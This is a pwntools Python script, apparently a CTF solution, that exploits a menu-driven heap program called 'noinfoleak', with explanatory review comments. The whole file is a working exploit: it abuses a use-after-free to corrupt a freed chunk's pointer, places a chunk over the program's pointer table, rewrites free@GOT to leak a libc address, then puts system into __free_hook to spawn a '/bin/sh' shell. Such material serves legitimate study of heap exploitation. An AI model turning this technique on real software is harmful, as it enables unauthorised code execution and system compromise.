from pwn import *
# Target/arch settings for pwntools; only the OS is pinned, the arch is left
# to ELF auto-detection (the amd64 line stayed commented out).
context.os = 'Linux'
# context.arch='amd64'

# Local-process run.  NOTE(review): `cn`, `elf` and `libc` are only bound
# inside this branch, so setting debug = 0 leaves every wrapper below
# referring to an undefined `cn`.
debug = 1
if debug:
    # context.log_level='debug'
    cn = process('./noinfoleak')
    elf = ELF('./noinfoleak')
    # libc=ELF('./libc-2.23.so')
    libc = elf.libc


# Tube wrappers.  Every payload is passed through str() before it is sent,
# which is a no-op for the Python 2 byte strings this script is written in;
# under Python 3, str(b'..') would produce the repr text and corrupt packed
# values, so the script is Python-2 only as written.
def s(data):
    """Send `data` verbatim (no trailing newline)."""
    return cn.send(str(data))


def sa(delim, data):
    """Wait for `delim` on the tube, then send `data` verbatim."""
    return cn.sendafter(str(delim), str(data))


def st(delim, data):
    """Send `data` verbatim and then wait for `delim`."""
    return cn.sendthen(str(delim), str(data))


def sl(data):
    """Send `data` followed by a newline."""
    return cn.sendline(str(data))


def sla(delim, data):
    """Wait for `delim` on the tube, then send `data` plus a newline."""
    return cn.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to `numb` bytes (default 4096)."""
    return cn.recv(numb)


def rl():
    """Receive one line."""
    return cn.recvline()


def ru(delims):
    """Receive until `delims` is seen."""
    return cn.recvuntil(delims)


def irt():
    """Hand the tube over to the user."""
    return cn.interactive()


def uu32(data):
    """Unpack a little-endian u32 from up to 4 bytes, zero-padded on the right."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a little-endian u64 from up to 8 bytes, zero-padded on the right."""
    return u64(data.ljust(8, '\0'))
def add(size, value):
    """Menu option 1: request a chunk of `size` bytes and fill it with `value`.

    Three '>' prompts are answered in turn: the menu choice, the size, and
    the contents.  The contents are sent without a trailing newline so the
    program receives exactly `value`.
    """
    menu_add = 1
    sla('>', menu_add)
    sla('>', size)
    sa('>', value)
def dele(ind):
    """Menu option 2: free the chunk stored at table index `ind`.

    Two '>' prompts are answered: the menu choice and the index.
    """
    menu_delete = 2
    sla('>', menu_delete)
    sla('>', ind)
def edit(ind, value):
    """Menu option 3: overwrite the chunk at table index `ind` with `value`.

    Three '>' prompts are answered: the menu choice, the index, and the new
    contents (sent without a trailing newline).  The script calls this on
    indices it has already freed, so the program apparently does not clear
    or check the table entry on free -- confirm against the binary.
    """
    menu_edit = 3
    ru('>')
    sl(menu_edit)
    ru('>')
    sl(ind)
    ru('>')
    s(value)
# Fixed address of the program's chunk-pointer table (author-chosen constant).
# A hard-coded .data address only works for a non-PIE binary -- re-check with
# checksec before reusing this against a different build.
lis = 0x6010a0

# ---- stage 1: heap layout and libc leak -----------------------------------
# Four allocations; the fill bytes are plain data, only the sizes matter.
add(0x5f,'a'*0x10)  # index 0
add(0x5f,'a'*0x10)  # index 1
add(0x7f,'\x11'*0x7f)  # index 2
add(0x10,'leo')  # index 3
dele(2)
dele(0)
dele(1)
# Index 1 was freed just above, yet edit() still writes into it: the program
# keeps stale table entries after free (use-after-free).  The value written is
# a pointer 8 bytes below fake_size_addr; presumably it replaces the freed
# chunk's forward pointer so a later allocation of this size is served from
# that address -- verify against the binary's free()/edit() handling.
fake_size_addr = 0x601095
edit(1,p64(fake_size_addr-8))
# Contents for the allocation that will be served near fake_size_addr: three
# padding bytes, two zero qwords, then four copies of `lis`.  NOTE(review):
# how these copies line up with the table is inferred from the author's
# "chunk0" remarks below, not from anything visible here.
pay='\x00'*3+p64(0)*2+p64(lis)*2+p64(lis)*2
add(0x5f,'/bin/sh\x00')  # index 4: this string is what free() receives at the end
add(0x7f,'\x78')  # index 5: the chunk whose contents will be printed
add(0x5f,pay)  # index 6: the allocation that overlaps the table
# After the overlap, index 2 apparently resolves to the table itself (author's
# "chunk0" note), so this edit makes entry 0 point at free's GOT slot and
# leaves 0x100 in the following qword.
edit(2,p64(elf.got['free'])+p64(0x100))  # entry 0 := &GOT[free]  ("chunk0")
# Editing entry 0 now writes free@GOT.  This write, and the restore below,
# only succeed while the GOT is writable, i.e. the binary is not Full RELRO.
edit(0,p64(elf.plt['puts']))
# free(index 5) now runs puts(index 5): the first byte was set to '\x78' and
# the rest is whatever the freed chunk still holds -- presumably a libc
# pointer left behind by the earlier free, which the subtraction below assumes.
dele(5)
# 6 bytes are enough for a user-space pointer; uu64 zero-pads to 8.
# 0x3c4b78 is a build-specific libc offset (the commented-out libc-2.23.so
# line above hints at glibc 2.23); any other libc build needs a new constant.
libc_base = uu64(r(6))-0x3c4b78
success('libc_base= {}'.format(hex(libc_base)))
# NOTE(review): `sys` most likely shadows the sys module that
# `from pwn import *` brings in; harmless here, but rename if sys is needed.
sys = libc_base + libc.symbols['system']
free_hook = libc.symbols['__free_hook']+libc_base
free = libc.symbols['free']+libc_base
success('free= {}'.format(hex(free)))

# ---- stage 2: hook overwrite ------------------------------------------------
# Put the real free back into free@GOT so later dele() calls free again.
edit(0,p64(free))
# Repoint entry 0 at __free_hook and store system() there.  Newer glibc
# builds no longer provide the malloc hooks, so this step is version-bound.
edit(2,p64(free_hook))  # entry 0 := &__free_hook  ("chunk0")
edit(0,p64(sys))
# free(index 4) -> __free_hook("/bin/sh") -> system("/bin/sh").
dele(4)
irt()